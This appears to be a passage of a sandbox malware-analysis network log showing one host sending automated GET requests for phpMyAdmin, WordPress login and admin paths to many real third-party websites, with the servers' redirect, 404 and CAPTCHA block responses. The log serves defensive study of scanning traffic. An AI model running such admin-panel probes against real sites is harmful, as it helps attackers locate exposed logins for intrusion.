20 20 20 20 62 6f 64 79 2c 0a 20 20 20 20 20 20 64 69 76 2c 0a 20 20 20 20 20 20 73 70 61 6e 2c 0a 20 20 20 20 20 20 61 70 70 6c 65 74 2c 0a 20 20 20 20 20 20 6f 62 6a 65 63 74 2c 0a 20 20 20 20 20 20 69 66 72 61 6d 65 2c 0a 20 20 20 20 20 20 68 31 2c 0a 20 20 20 20 20 20 68 32 2c 0a 20 20 20 20 20 20 68 33 2c 0a 20 20 20 20 20 20 68 34 2c 0a 20 20 20 20 20 20 68 35 2c 0a 20 20 20 20 20 20 68 36 2c 0a 20 20 20 20 20 20 70 2c 0a 20 20 20 20 20 20 62 6c 6f 63 6b 71 75 6f 74 65 2c 0a 20 20 20 20 20 20 70 72 65 2c 0a 20 20 20 20 20 20 61 2c 0a 20 20 20 20 20 20 61 62 62 72 2c 0a 20 20 20 20 20 20 61 63 72 6f 6e 79 6d 2c 0a 20 20 20 20 20 20 61 64 64 72 65 73 73 2c 0a 20 20 20 20 20 20 62 69 67 2c 0a 20 20 20 20 20 20 63 69 74 65 2c 0a 20 20 20 20 20 20 63 6f 64 65 2c 0a 20 20 20 20 20 20 64 65 6c 2c 0a 20 20 20 20 20 20 64 66 6e 2c 0a 20 20 20 20 20 20 65 6d 2c 0a 20 20 20 20 20 20 69 6d 67 2c 0a 20 20 20 20 20 20 69 6e 73 2c 0a 20 20 20 20 20 20 6b 62 64 2c 0a 20 20 20 20 20 20 71 2c 0a 20 20 20 20 20 20 73 2c 0a 20 20 20 20 20 20 73 61 6d 70 2c 0a 20 20 20 20 20 20 73 6d 61 6c 6c 2c 0a 20 20 20 20 20 20 73 74 72 69 6b 65 2c 0a 20 20 20 20 20 20 73 74 72 6f 6e 67 2c 0a 20 20 20 20 20 20 73 75 62 2c 0a 20 20 20 20 20 20 73 75 70 2c 0a 20 20 20 20 20 20 74 74 2c 0a 20 20 20 20 20 20 76 61 72 2c 0a 20 20 20 20 20 20 62 2c 0a 20 20 20 20 20 20 75 2c 0a 20 20 20 20 20 20 69 2c 0a 20 20 20 20 20 20 63 65 6e 74 65 72 2c 0a 20 20 20 20 20 20 64 6c 2c 0a 20 20 20 20 20 20 64 74 2c 0a 20 20 20 20 20 20 64 64 2c 0a Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta charset="UTF-8"/> <title>Visitor anti-robot validation</title> <meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta name="robots" content="noindex, nofollow" /><meta name="keywords" content="joomla, Joomla, joomla 1.5, wordpress 2.5, Drupal" /><meta name="description" content="Joomla!" /><meta name="generator" content="Joomla! 1.5 - Open Source Content Management" /><meta name="generator" content="WordPress 2.5" /> <style> html, body, div, span, applet, object, iframe, h1, h2, h3, h4, h5, h6, p, blockquote, pre, a, abbr, acronym, address, big, cite, code, del, dfn, em, img, ins, kbd, q, s, samp, small, strike, strong, sub, sup, tt, var, b, u, i, center, dl, dt, dd,
Feb 21, 2024 00:26:13.485843897 CET	1286	IN	Data Raw: 20 20 20 20 20 20 6f 6c 2c 0a 20 20 20 20 20 20 75 6c 2c 0a 20 20 20 20 20 20 6c 69 2c 0a 20 20 20 20 20 20 66 69 65 6c 64 73 65 74 2c 0a 20 20 20 20 20 20 66 6f 72 6d 2c 0a 20 20 20 20 20 20 6c 61 62 65 6c 2c 0a 20 20 20 20 20 20 6c 65 67 65 6e Data Ascii: ol, ul, li, fieldset, form, label, legend, table, caption, tbody, tfoot, thead, tr, th, td, article, aside, canvas, details,
Feb 21, 2024 00:26:13.485860109 CET	1286	IN	Data Raw: 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 43 61 6c 69 62 72 69 22 2c 20 52 6f 62 6f 74 6f 2c 0a 20 20 20 20 20 20 20 20 20 20 4f 78 79 Data Ascii: font-family: -apple-system, BlinkMacSystemFont, "Calibri", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif; line-height: 150%; } .page-container { background-color: transparent;
Feb 21, 2024 00:26:13.485881090 CET	1286	IN	Data Raw: 61 6c 65 72 74 20 70 20 7b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 20 30 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 2e 70 61 67 65 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 63 61 70 74 63 68 61 2d 63 6f 6e 74 61 69 6e 65 Data Ascii: alert p { padding: 10px 0; } .page-container .captcha-container { margin-top: -20px; } @media screen and (min-width: 460px) { .page-container .captcha-container { padding: 10px 10px;
Feb 21, 2024 00:26:13.485924959 CET	1286	IN	Data Raw: 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 2e 70 61 67 65 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 63 61 70 74 63 68 61 2d 63 6f 6e 74 61 69 6e 65 72 20 23 6d 6f 72 65 49 Data Ascii: font-weight: bold; } .page-container .captcha-container #moreInfoDropdown { font-size: 14px; text-align: center; color: #c40000; cursor: pointer; } .page-container .captcha-contai
Feb 21, 2024 00:26:13.485975027 CET	1286	IN	Data Raw: 74 65 72 3b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 63 65 6e 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 Data Ascii: ter; width: 100%; } .center { text-align: center; } .right { text-align: right; } .visible { display: block !important; } .invisible { display: none !i
Feb 21, 2024 00:26:13.485996008 CET	1286	IN	Data Raw: 20 20 20 66 75 6e 63 74 69 6f 6e 20 61 64 61 70 74 69 76 65 43 6f 6c 6f 72 28 0a 20 20 20 20 20 20 20 20 68 65 78 2c 0a 20 20 20 20 20 20 20 20 64 61 72 6b 43 6f 6c 6f 72 20 3d 20 22 23 30 30 30 30 30 30 22 2c 0a 20 20 20 20 20 20 20 20 6c 69 67 Data Ascii: function adaptiveColor( hex, darkColor = "#000000", lightColor = "#FFFFFF" ) { if (hex.indexOf("#") === 0) { hex = hex.slice(1); } // convert 3-digit hex to 6-digits. i
Feb 21, 2024 00:26:13.486037970 CET	1286	IN	Data Raw: 20 6c c3 b6 73 65 6e 20 53 69 65 20 64 61 73 20 3c 62 3e 43 41 50 54 43 48 41 3c 2f 62 3e 20 75 6e 74 65 6e 2c 20 75 6d 20 77 65 69 74 65 72 20 7a 75 20 73 75 72 66 65 6e 20 75 6e 64 20 75 6e 73 20 62 65 69 20 64 65 72 20 42 65 6b c3 a4 6d 70 66 Data Ascii: lsen Sie das <b>CAPTCHA</b> unten, um weiter zu surfen und uns bei der Bekmpfung von Cyberkriminalitt zu helfen.", SUBMIT: "Lschen meiner IP", HEADING: "Warum ist das notwenig?", PRE_BODY: "Ihre IP Adresse",
Feb 21, 2024 00:26:13.486067057 CET	1286	IN	Data Raw: 42 4f 44 59 3a 20 22 59 6f 75 72 20 49 50 20 61 64 64 72 65 73 73 22 2c 0a 20 20 20 20 20 20 20 20 50 4f 53 54 5f 42 4f 44 59 3a 0a 20 20 20 20 20 20 20 20 20 20 22 68 61 73 20 62 65 65 6e 20 62 6c 6f 63 6b 65 64 20 66 6f 72 20 73 65 63 75 72 69 Data Ascii: BODY: "Your IP address", POST_BODY: "has been blocked for security reasons.<br>Probably your IP address has been used for violation of server security rules before.<br>We have to make sure that this is not a malicious, automa
Feb 21, 2024 00:26:13.486074924 CET	1286	IN	Data Raw: 61 64 6f 72 20 73 65 61 20 75 6e 61 20 70 65 72 73 6f 6e 61 20 79 20 6e 6f 20 65 6c 20 73 6f 66 74 77 61 72 65 20 64 65 20 75 6e 20 48 61 63 6b 65 72 2e 20 50 6f 72 20 66 61 76 6f 72 20 72 65 6c 6c 65 6e 65 20 65 6c 20 43 61 70 74 63 68 61 2e 20 Data Ascii: ador sea una persona y no el software de un Hacker. Por favor rellene el Captcha. Al rellenar correctamente el Captcha, su IP actual, ser eliminada automticamente de nuestra lista de IP's maliciosas.", BEST_REGARDS: "Muchas Gracias
Feb 21, 2024 00:26:13.670595884 CET	1286	IN	Data Raw: 65 20 76 61 6c 69 64 c3 a9 20 c3 a0 20 74 72 61 76 65 72 73 20 6c 65 20 3c 62 3e 43 41 50 54 43 48 41 3c 2f 62 3e 2c 20 76 6f 74 72 65 20 61 64 72 65 73 73 65 20 49 50 20 73 65 72 61 20 73 75 70 70 72 69 6d c3 a9 65 20 64 65 20 6c 61 20 6c 69 73 Data Ascii: e valid travers le <b>CAPTCHA</b>, votre adresse IP sera supprime de la liste grise de BitNinja.", BEST_REGARDS: "Merci.", SIGNATURE: "L'quipe BitNinja", ACCESSING: "Ouverture", SECURELY: "en scurit

Session ID	Source IP	Source Port	Destination IP	Destination Port
343	192.168.2.6	63130	75.2.70.75	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:13.320224047 CET	172	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: eyegage.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:13.416507959 CET	349	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:13 GMT Content-Type: text/html Content-Length: 166 Connection: keep-alive Location: https://eyegage.com/phpMyAdmin Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
344	192.168.2.6	63069	81.169.145.86	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:13.347079039 CET	178	OUT	GET /wp-login.php HTTP/1.1 Host: ksv-schwimmen.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:13.525748968 CET	461	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:13 GMT Server: Apache/2.4.58 (Unix) Location: https://ksv-schwimmen.de/wp-login.php Content-Length: 245 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6b 73 76 2d 73 63 68 77 69 6d 6d 65 6e 2e 64 65 2f 77 70 2d 6c 6f 67 69 6e 2e 70 68 70 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://ksv-schwimmen.de/wp-login.php">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
345	192.168.2.6	62866	218.213.216.154	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:13.354638100 CET	164	OUT	GET /pma/ HTTP/1.1 Host: att.com.hk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:13.653008938 CET	1286	IN	HTTP/1.1 404 Not Found Date: Tue, 20 Feb 2024 23:26:13 GMT Server: Apache Last-Modified: Wed, 21 Mar 2018 06:16:02 GMT ETag: "696-567e62015ec80" Accept-Ranges: bytes Content-Length: 1686 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 45 52 52 4f 52 20 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 20 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 34 34 34 34 34 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 45 45 45 45 45 45 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 54 72 65 62 75 63 68 65 74 20 4d 53 27 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 38 30 25 3b 0a 20 20 20 20 7d 0a 20 20 20 20 68 31 20 7b 7d 0a 20 20 20 20 68 32 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 32 65 6d 3b 20 7d 0a 20 20 20 20 23 70 61 67 65 7b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 36 30 25 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 32 34 70 78 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 32 70 78 3b 0a 20 20 20 20 7d 0a 20 20 20 20 23 68 65 61 64 65 72 20 7b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 70 78 20 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 7d 0a 20 20 20 20 2e 73 74 61 74 75 73 33 78 78 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 34 37 35 30 37 36 3b 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 20 7d 0a 20 20 20 20 2e 73 74 61 74 75 73 34 78 78 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 43 35 35 30 34 32 3b 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 20 7d 0a 20 20 20 20 2e 73 74 61 74 75 73 35 78 78 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 32 45 38 31 41 3b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 20 7d 0a 20 20 20 20 23 63 6f 6e 74 65 6e 74 20 7b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 34 70 78 20 30 20 32 34 70 78 20 30 3b 0a 20 20 20 20 7d 0a 20 20 20 20 23 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 36 36 36 36 36 36 3b 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>ERROR 404 - Not Found!</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="robots" content="noindex" /> <style type="text/css">... body { color: #444444; background-color: #EEEEEE; font-family: 'Trebuchet MS', sans-serif; font-size: 80%; } h1 {} h2 { font-size: 1.2em; } #page{ background-color: #FFFFFF; width: 60%; margin: 24px auto; padding: 12px; } #header { padding: 6px ; text-align: center; } .status3xx { background-color: #475076; color: #FFFFFF; } .status4xx { background-color: #C55042; color: #FFFFFF; } .status5xx { background-color: #F2E81A; color: #000000; } #content { padding: 4px 0 24px 0; } #footer { color: #666666;
Feb 21, 2024 00:26:13.653028011 CET	636	IN	Data Raw: 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 39 66 39 66 39 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 35 70 78 20 23 Data Ascii: background: #f9f9f9; padding: 10px 20px; border-top: 5px #efefef solid; font-size: 0.8em; text-align: center; } #footer a { color: #999999; } --></style></head><body> <div i

Session ID	Source IP	Source Port	Destination IP	Destination Port
346	192.168.2.6	63081	193.70.18.144	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:13.368432045 CET	161	OUT	GET / HTTP/1.1 Host: imp.ovh.net Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:13.531639099 CET	92	IN	HTTP/1.1 301 Moved Permanently content-length: 0 location: https://www.ovh.co.uk/mail/

Session ID	Source IP	Source Port	Destination IP	Destination Port
347	192.168.2.6	63195	31.193.11.2	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:13.423568010 CET	179	OUT	GET / HTTP/1.1 Host: www.caspianseagulltravels.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:13.583442926 CET	449	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:13 GMT Server: Apache Location: https://www.caspianseagulltravels.com/ Content-Length: 246 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 61 73 70 69 61 6e 73 65 61 67 75 6c 6c 74 72 61 76 65 6c 73 2e 63 6f 6d 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.caspianseagulltravels.com/">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
348	192.168.2.6	63340	75.2.70.75	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:13.429963112 CET	173	OUT	GET /wp-login.php HTTP/1.1 Host: eyegage.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:13.524838924 CET	351	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:13 GMT Content-Type: text/html Content-Length: 166 Connection: keep-alive Location: https://eyegage.com/wp-login.php Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>
Feb 21, 2024 00:26:13.735652924 CET	351	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:13 GMT Content-Type: text/html Content-Length: 166 Connection: keep-alive Location: https://eyegage.com/wp-login.php Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>
Feb 21, 2024 00:26:16.774454117 CET	217	OUT	GET /wp-admin/ HTTP/1.1 Host: eyegage.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://www.eyegage.com/wp-login.php
Feb 21, 2024 00:26:16.870913982 CET	347	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:16 GMT Content-Type: text/html Content-Length: 166 Connection: keep-alive Location: https://eyegage.com/wp-admin Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
349	192.168.2.6	63198	162.215.240.240	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:13.437426090 CET	174	OUT	GET /pma/ HTTP/1.1 Host: wefttechnologies.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:13.655641079 CET	1286	IN	HTTP/1.1 404 Not Found Date: Tue, 20 Feb 2024 23:26:13 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://wefttechnologies.com/wp-json/>; rel="https://api.w.org/" Upgrade: h2,h2c Connection: Upgrade Vary: Accept-Encoding Content-Encoding: gzip Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Data Raw: 31 66 61 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc b2 eb 76 dc c6 d5 2d fa 5b 7a 8a 12 72 b6 45 7e 21 d0 75 af 02 c5 96 b7 dd 76 3e 65 0f 2a c9 89 1c 66 6f 39 1e 1e 60 a3 ba 1b 36 1a e8 00 68 36 19 45 63 9c d7 38 af 77 9e e4 cc 2a a0 2f a4 28 89 b6 ec 24 4a cc c6 aa 75 99 73 cd 35 cf 9e c4 f1 59 eb a6 5d 51 57 64 5a 66 6d 3b 8e ae 0a b7 59 d5 4d 17 3d 8f e3 e7 8f cf 50 41 86 7f 67 79 71 45 8a 7c 1c b5 d3 a6 2e cb 78 5a 57 5d 56 54 ae 89 b6 bd ef 24 86 19 79 3d ed 6e 56 8e 2c ba 65 89 d8 ff 90 32 ab e6 e3 c8 55 f1 5f 5e 45 fe cd 65 f9 f3 c7 8f ce 96 ae cb c8 74 91 35 ad eb c6 d1 5f be f9 5d 6c a3 dd 7b 95 2d dd 01 43 e2 81 5c 85 ba 4d 91 77 8b 71 ee ae 8a a9 8b 43 70 42 8a aa e8 8a ac 8c db 69 56 ba 31 0b 53 ca a2 fa 91 34 ae 1c 47 ab a6 9e 15 a5 8b c8 a2 71 b3 71 b4 e8 ba 55 7b 3a 1a cd 97 ab 79 52 37 f3 d1 f5 ac 1a 31 df 14 36 0f e8 68 59 b9 a6 bb 19 47 f5 fc b4 ac fd d8 03 0a ae fa 1e 9b 90 d1 8e ec ad 72 bf fe 21 5f 77 d9 16 9d 3b 2c 0f bb 3d 6d ea cb ba 6b 9f ee 2a 9f 56 75 51 e5 ee fa 84 cc a0 6c bd 79 ea 3b d0 e2 cf f2 cd a2 68 89 1f 43 f0 5b af ba 62 59 fc c3 e5 64 53 74 0b d2 2d 1c f9 3f 75 d6 76 e4 d5 d7 7f 24 ab 72 3d 2f 2a 72 c5 59 62 49 4c b6 cb de f8 82 64 5a 2f 47 9b ba c9 57 8d 6b db 51 5f da 8e 5a 57 8f 88 bf de a3 b3 ae e8 4a f7 fc 4f d9 dc 91 aa ee 40 64 5d e5 98 f2 aa 9e 75 9b ac 71 e4 2b 77 e5 ca 7a b5 04 5f 32 a9 97 ab ac ba 21 ff 24 7f 